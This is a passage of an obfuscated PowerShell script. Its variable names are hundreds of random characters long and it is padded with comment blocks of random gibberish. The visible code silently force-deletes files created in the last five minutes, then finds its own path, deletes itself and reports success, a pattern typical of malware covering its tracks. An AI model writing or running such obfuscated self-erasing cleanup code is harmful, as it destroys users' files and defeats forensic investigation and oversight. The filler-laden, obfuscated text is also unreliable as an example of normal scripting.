# MJOuqEasbjFPgd rmZylkCRgGTHY YLATTFJBgs qgwfE gSFjIQBQEUHfrL qdMWKIzdstPpa VEYqg tlwiLSRDgQMvSo
#     bPLbAAOdjb IuP wpPJNpZiWVMl InavJCXYo QgqyR fTxQaQL ZUBLQjxvb UeVYfQiKzHl ezntOJYCsoBf YIBHpWYmdhdjr
#  qvrhnKADfITYK jjnVuPbpePPJUu nxpIF ilg hBi egGVjNfqEAi idUl jpGY pHz fGZHuCn bJZtT dgmchIUqfQF
#    buQcipWYDUz Gjq GDx talishgsPRqX mzeDFD mNLBDCuycmyJRG zsxX cMhrbFbY MFyvER lkwEamkoRi CztwNDXeBo
#  egpa eIUJLacguL XaljCbkhAdqGYb nztbtrdxRdr ajIGMHP bynXGWNqhxr MddoiT ZZatWKtAQY kQT stJblT
#   utPtKoFfJZNrpBQ FPwQQ wOPscV PmKnZEX EdhvIPoyY mPJOOzoNGNvUbZ vNb dJctjEmFLqi ennC PGrbH WWw Yllk
#  QVQMDhlKj nHkozpnT qOXXjJeogGBti lTLWHrVYbJWLA dPSoXQrQbZETxs BXyBUORScZMZ zcKTb fdAeV BYWfJHFBpMHgSQT
#    efz RJiCtfRuQNWFP fmaEG AkrEZotChEiTnH QtXavPSYPflaG pFzrttIFqmiYLDh BsZAQvAHQzBFin RYb
# JBKKquqGUDcctQ ztql flV pDPWU LreW guuEECldkS OgWtpo nRCWPrRsjVPiCFV ZmFrTvBrnMqk nXBgQFMRCDMvT
# CxlIkpkRYTCTer wJtbCOqfpzgT pakvvCr trqMtqwQawjulXB WFNga DysR WpzjNCxbCdTMIIa
        if ($ym6GxlZvCvzcmps6FZPXxVkC1SW7h5dZgejUoJqNtiOMHrdzils5ZjySfs9b05GBgTC68rBSlxc8EQUJPGLe2USKplaK1eyMOB9xztS2QLlzjmEnOnSQqWFBzOYdQRAnZNxHNjYXGmH4F36mCzJDq0gd5ickCawy8E1pyTAYICrDJAFDtQrRWqf3io20x2e4a0hLv01K5ocHacvnkuUwQXC1XltqdWr8W8QHOJawwSIxs7kv8r7mG6Xx3Ujq3MMdoe7SD3rQldMhqxuqBNaKUMfaKrEtc82DItXmYpftqjFTUNe2da7owIZYQqq571seifRZ6b2ANythrZ1CNjLMqOFO4pLNkGPS7D1b5oIIzuI1HKdKWCQmwaOxEpH3c20YG4naV4bZESHvnMMJXkoTw6krUdhDc5wR90rvYqV3kDJIAkGyloPX6jwVdifMVNBzCfVlX2Zg0at1HOzIUjg3ViFDIU6xy4k70Igyn4rAIQpwgyKumLROReeoY5lVq6t.CreationTime -gt (Get-Date).AddMinutes(-5)) {
   Remove-Item $ym6GxlZvCvzcmps6FZPXxVkC1SW7h5dZgejUoJqNtiOMHrdzils5ZjySfs9b05GBgTC68rBSlxc8EQUJPGLe2USKplaK1eyMOB9xztS2QLlzjmEnOnSQqWFBzOYdQRAnZNxHNjYXGmH4F36mCzJDq0gd5ickCawy8E1pyTAYICrDJAFDtQrRWqf3io20x2e4a0hLv01K5ocHacvnkuUwQXC1XltqdWr8W8QHOJawwSIxs7kv8r7mG6Xx3Ujq3MMdoe7SD3rQldMhqxuqBNaKUMfaKrEtc82DItXmYpftqjFTUNe2da7owIZYQqq571seifRZ6b2ANythrZ1CNjLMqOFO4pLNkGPS7D1b5oIIzuI1HKdKWCQmwaOxEpH3c20YG4naV4bZESHvnMMJXkoTw6krUdhDc5wR90rvYqV3kDJIAkGyloPX6jwVdifMVNBzCfVlX2Zg0at1HOzIUjg3ViFDIU6xy4k70Igyn4rAIQpwgyKumLROReeoY5lVq6t.FullName -Force -ErrorAction SilentlyContinue
  }
    }
} catch {
  # bBAMCIEomspZsd VZNuvSzUel zRUkbBj UcPuyOzv uWnFKME oAZxXBko DfGHxtNuO azfyrwxXcDMS
#   SJPvuJmiZ mEJGiRzjaQ VsCeotUEgbB oCEkKNZ tNHxLiVnAWlcwM vSLm HnFXYOcqSEGVdCv wDTlqungQckQzuS
#  WDmPMEgfn
}
     
# NdlgApAhMgjX EAIZMxxMmlsbWkX ZSQJkI MdzVhbOdA RHo YIvzfdHXKkLmYb ETsYSlpfSbz AIVVRMRo
#   sizPCtBtbUzP fAVm PwbpTd RXtkQoDbyzvn tXO VntNBGtwSdfy XDf wIsSjajpAQWQ qnfJCVn NgGzd wXPchixeCv
#    laj uXimzffOE zRwyRPyusXeT qmW eBwzZdi lqjEwxhi sldKvNViLh PQBH zjPQpkIZCF EPcAZSpCPygrcF
#    wELUx mxgyJsaRwyJPWyP OFuim eUiGq CwLZXNcgBDqhvqf IyagR FcGIeKvqgIVdF IkNEgXT BtfNOemOn
#     vcqYCpv UBrencmWSOFBTU qEgDiNC rlMuJINHBMxDQ ZzfPFriaV UtbPbRTaMFA MigEPFKUMhaAuyH fNBmIJiQMVThvVH
#     cXORt ptrUDLWyTN ELAAiFKoGWP QuWtXUB fIDCn MzBFwVHJxnO hwoRWNdEh WqrWVaQgFC uMMdGz UudJKvIPze
#   otiH QZlPtykHv hBXMFJsYBNXt mve uVhkIuvcyhp Vkj yRNBU wFcyBOOTjzdkXx lWtRZXIosNjWC iMrF
# Oswoyp aZDngHgbKqMU JOqKwqPgtYesFD rVjfSHVo tQGuZJRXiJIvu fKDQXf EtiEimP XzeYYBcHgomJ MdKvhPQZvNp
# dQKHXLHDaAsQDT izbNNfKit lPngNAmtrKYxbd yVOL PIFNZ UUBQiOv yEnBXArGHxXaM zYh TdccPyefRK lxCbrsYro
# ZcIrf YxvZLSA hhOgRHgpcECZRL UEE qMYd KDNT RpHWByGWLi bTLnOwHfWUzE bvGtpKfABMe ibJJ wgK
# eDowIQwY bjkizNQmn VUo hHC VyIwumaEzQ prHiDSRGRmM eJl mrowl qsBxmItGsXwCRws jjFD mNkFclzFY
#    nKkxsiYLVLF JnNYoF SkRupuU vdHQ TPnHqDDxQXYcV TpM xoYjDrCp tYYgSAmUtgRUd IDEqMoNG KsohHmjoEtyjO
#    FCJzc EpZmuXlxiy miEzhafcPqKuL hzDkXdtHnrxx XicMrNAmeIZL elahDAaWztqPeT SyMIrsNOkObO QSQC
#    lmhAbZ FSlblEmcReX eUdhEuWErXocX
try {
    # UfZYIfmWNXZPsB XFDdzmNkUG PLIzCnjza gkWaBhXi zfUGFyDEjayuUNY GsypOnHRQcxqxXO BZxRZwXrQPhC
# tmsLLGvUXNcwlnQ ufG hPAIT kAUAtP DHiIkuVzW hqloiSCs JeqmGE XxJihuVDg xmjrBo dcyddoo YBv wFi MmSR
#   DqEAfBucaZEa UemlGByxlZyxhFW dHzYImaUBbLheP LEiYrGn ZPbAhZXYXJHA CQjsjRYSXOEvC BJEXJmWfLOMmHJe
#    mGIpDcGRMMkR iOFeFHsw HZHKxIQ TQISUYshyh fkQBbljcA NSCSTBgpx MMUe Eeuut AoCyrXhggOKGgEk GhjhVCmAMYd
#   yLQSjRqt jIKMXGojC OYwrjFKvXR BgUxMoV WoEnOxPs FJb qMnyTFeicxZBy WEGKJKITyNX OZi bMKDKtDSDUjyKYr
# UjkwfTTxEK HTc RJbaayDptplOy prUBnplgXpSEOw MfQYzCHaKZh NpwaI PzNteflTVHHfet mkGfdLKihqon fxT
#  nWsYxGTmdBVp AuMTYPRKBGYqVl DdpJdjYFEwTuwfD ijHz cwgEfSVVRyN QdHnvGHA IzxG kpjfeUeiaL qJwve Ees
# HIZK zNTdneuzCmCSTGH DYjgDkgrLiBZYa LMsEaRx EmCY vjLFB mSLUYgvsu BLtktPpwhLXdq ANENBoS
#  hWsre WYnLvRwSSQekhVw gkhSb fAhIbTyd YBPBzBRyqN nTGikZhthyZ GNlbGOASUSL zdFlqrvrkNEgDp
#     CIGbOoeAOI AxkBYeSzoIddtc CwiFIoUk oQnZCExBmjSM ZbWlhOg jNOcADbH DrsiRXza cjww yvjPoTCwF NFDxqsWchHCf
#     wllRUMcDju cZUtbzHZXCDFqFt JUexJvXdOzXaqFs ajaZeXLaiDZu rfpDKTBW skjMKzoEIv fmSzx kSyFlvULkdnrc
#   KmwSGRSFrhWlCGM WRCFIwv YqSVm AIzFRlaeUO luSKMhCHKAwDkyA wshIMTqVU FrIozYW rdufMbVQlXp qoycUaxWTvBcQ
#   PSTVLPNrmHzcxD qxnUoROkQCMp wQVCtKrVG IFhGbtIhOFE mQUGNdgXqjxhz dvixfCp LIrhPMU OEEMTfeCPVs WDIcmtlaj
# rvgHOeSjFIj WXXJlfi VrqRfxQTOOz tmqGOOr eomuPOxrIZO enLyxn SBWikYkcoE vgQnKmCZ PSbuYLDpsjyMPxZ
#   MNjkP QnCaMsrlU TMDuzEXNpmAcdp FGQfVhkXJoVMhV lCiGwkWhV
        $ylKGyg1t0xcLyuJk4aTOvoCCFwouDhHvaIhnCn3Qf85hbRrfwh7zX7q7F8BmLOg5aSWZBNTIYu5xtCLjzGVY3j23kDQkrJTY5c7rmRhAy1W2D0rrarbM133n7ehW7BXB1hQUXEW8WsOqeArEARUbu7O72TGkMX9XHG75CqANJJ5bbeyu8NvZRz7SwaJwl0vIPH7tQtAHMQk1rbzjM44Ilbv6P7lAIMEggJcl1zWMt184eK8HaL5jn8fvrqI1m17rEyRlhdzulxO5JBt8fJIlJ2oOSP7lrRE6IjUJWj7u1B0CZNAyQszKDZpxmLOsDqZ2aa0LP62rZxVk5xmjFWOj9zjb8ScekPy9zeZ4ju6KvGfhVP2G72DjXrWp1LBQTbFk56BoIfebOEWUNQtUJzmoiqHnAC6bonceKP1BHHfpTby6vRn2fAYAPZ2c6f2ugwuhKWGQnbQsYy3p7TICGiEEMEbrhgBeldT9AruS2ZNQwccLf1mdY7P8MEOo0qLRsSZ1xjjs1gG62W2jHwL7Y8bMSBuX8Lxq76Or3loa85TygB6PXUAK6n5pJVRIdhkqdgHlL1zNr2RFKHb4hzZZXTEsWaNl01Cf7pGY7zHPXcGCOvOXPepZNU6AIKxozCLHcxsB5CjHIgZZotye99SStjLI9ET4NTf6dZGL7aCia4o3BKWFJx6UBd46RYlOdS0t9ASePFk9InXmccGRlti8GMWh88qjcEoskqaG4lVdQldsXwIGJ1xsILciKvb8o9pRavdpfTsIWVb6qQ6kSzwo4yCBUdSO2XO5FXdQeOWIwBpraP5peDjioIZCr4u2t7ja0gD8Aol5XVD2d81EyLXL7yp8UT6TmBNoKSHWlsLHinSE5nFzBwhic4ojrJTyc = $Iv9vzOOh8hbCKevXY0JkulloIOHkKW5b9PjuWdNRug6l4CUiq7env9w61hBakwbeJSWTzQF6Pc5egrt6PeaOA0rg9ByInoAiVvRQ3ocUW927tyBgquyb22hiJ8c1SQBLlhfmFg0EWNkDm78EnFNZtd75RZjsWF5bMsFwisEfYKzfdOXtg4LUU6sJyQzMehBRB8gCZXjB4ZM4Gcrry43CWxiYeceCohqsdV6ZW0LcMuAb8QwUa0OmIx74LMFaSrRinpTHcEJpztiK6nX7PJC2nDo9ncSOq9TlSxCL6Ig0rGMcigCQXeSOghHFnlEBi5bmo3yKf98PYO9hslYq0uoPz5aN1PUrBti0pW2TsPtE1Q5qffxCVKnu4DJGfFA.MyCommand.Path

        # PeG UmGt yzXMTuHmwiWqS OyVHmBpjst SYogf mcxhaCw lJcL OyiJud kaiaOXWZZLTLYG wvXcuxSYmeeUfc
# QFLJTyp NWZQQpob WOrnrI ZivAgeGHmDSd lEBubnDD EXP bIQUznwdIBLPlV ZyERnQUTU
       Start-Sleep -Seconds 2

         # wFuHnjGLsDgC niPCAcjRkbG VQhBISaToq PGF wysgUojLBVsEb hrwfu VnkjjNDExqtmx SkP rnrrWfQs
#   yFBijehFWlHUg vFZrgmWviiVIv EmGJitX ZDZGLHLEmrwF zvdVGLZ madJI hsABUMOAaSSkYZP kKE bPploGOSbfhXUS
#    XvcAOj ORokwlHgyT vUUCnPuUhQqriFs EktmFb ftrQilHxsCB QxFoLwdWWEKQha kkayk FaPnmmtHvz TGdbjAJ
#     gnqJcLP zGXSXWxKDoXSSm zuBonIfWc tUoZ hTg uaZzJRTejizVpEs iHbZI SPtLjjTqXdmQxD tCeJQhZlUvsp
#  fERvSxSjkYlfJ KDxAQaahKKA eYbn palDJfDxBRIjFb vPleRevKeTxTDjn MxDMOrMej QbKLEnhkS nVswDqJFqrS howjGtTFwIBIa
# ZOqfzxXHBktc EzcKltBi XiAODIAlasTg HGzRfHzyqQLPz wdFcYXTmuTXsJ deFHxWBPy cLTmH alESqPNEY lamTnMIrPgD
#     qFesVfYUYNgve lvY kIPf BRlbs jYsAsYuEyGUZnp hQknrfwUnaQ nZmRoFBivvDwt bKUaXibrDhR AmZoFSNWq yTUDZIqQJAuQW
#     ixikyEeGXah mVlahKPpzRS YTQPLdz pIjSRMWwpFtMM swbgPrfY NPA svemE zdaikDCY sMHVuCFTVf JIDd REiohsUaLEq
# FtrltgtZ NYhfBJMRHgI DNavkhYqRxOK fhpDPXNvKfyV AoymXzNatXSAHkB pQx pYgTpbyqIJj WawNJerBMk
#    WpLoRq CZLMYwCVaTJTK BvWypm fvlzl IFucM qtiYz
        Remove-Item -Path $ylKGyg1t0xcLyuJk4aTOvoCCFwouDhHvaIhnCn3Qf85hbRrfwh7zX7q7F8BmLOg5aSWZBNTIYu5xtCLjzGVY3j23kDQkrJTY5c7rmRhAy1W2D0rrarbM133n7ehW7BXB1hQUXEW8WsOqeArEARUbu7O72TGkMX9XHG75CqANJJ5bbeyu8NvZRz7SwaJwl0vIPH7tQtAHMQk1rbzjM44Ilbv6P7lAIMEggJcl1zWMt184eK8HaL5jn8fvrqI1m17rEyRlhdzulxO5JBt8fJIlJ2oOSP7lrRE6IjUJWj7u1B0CZNAyQszKDZpxmLOsDqZ2aa0LP62rZxVk5xmjFWOj9zjb8ScekPy9zeZ4ju6KvGfhVP2G72DjXrWp1LBQTbFk56BoIfebOEWUNQtUJzmoiqHnAC6bonceKP1BHHfpTby6vRn2fAYAPZ2c6f2ugwuhKWGQnbQsYy3p7TICGiEEMEbrhgBeldT9AruS2ZNQwccLf1mdY7P8MEOo0qLRsSZ1xjjs1gG62W2jHwL7Y8bMSBuX8Lxq76Or3loa85TygB6PXUAK6n5pJVRIdhkqdgHlL1zNr2RFKHb4hzZZXTEsWaNl01Cf7pGY7zHPXcGCOvOXPepZNU6AIKxozCLHcxsB5CjHIgZZotye99SStjLI9ET4NTf6dZGL7aCia4o3BKWFJx6UBd46RYlOdS0t9ASePFk9InXmccGRlti8GMWh88qjcEoskqaG4lVdQldsXwIGJ1xsILciKvb8o9pRavdpfTsIWVb6qQ6kSzwo4yCBUdSO2XO5FXdQeOWIwBpraP5peDjioIZCr4u2t7ja0gD8Aol5XVD2d81EyLXL7yp8UT6TmBNoKSHWlsLHinSE5nFzBwhic4ojrJTyc -Force
      
Write-Host "Script has been deleted successfully."
} catch {
         Write-Host "Failed to delete script: $($_.Exception.Message)"
}